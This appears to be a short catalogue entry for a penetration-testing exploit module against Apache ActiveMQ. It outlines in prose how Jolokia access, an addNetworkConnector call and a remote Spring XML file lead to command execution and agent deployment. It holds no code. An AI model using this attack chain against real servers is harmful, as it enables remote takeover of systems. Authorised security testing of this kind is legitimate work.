This module abuses Jolokia access to invoke the ActiveMQ Broker MBean addNetworkConnector operation. The crafted connector uses the VM transport brokerConfig option to load a Spring XML document from the IMPACT web server. The XML instantiates java.lang.ProcessBuilder and executes the agent deployment command sequence. The exploitation process performs the following steps: Starts the IMPACT web server and registers a randomized Spring XML payload path. Checks that the target Jolokia endpoint is reachable with the configured credentials. Discovers the ActiveMQ broker name through Jolokia, or uses the configured broker name when provided. Builds a malicious network connector URI using vm:// and brokerConfig=xbean to reference the Spring XML payload hosted by IMPACT. Sends a Jolokia exec request to call addNetworkConnector(java.lang.String) on the ActiveMQ Broker MBean. Waits for the target to fetch the Spring XML payload and execute the generated agent deployment command sequence. The deployed agent will run with the same privileges as the Apache ActiveMQ service.
CVE Link
Exploit Type
Product Name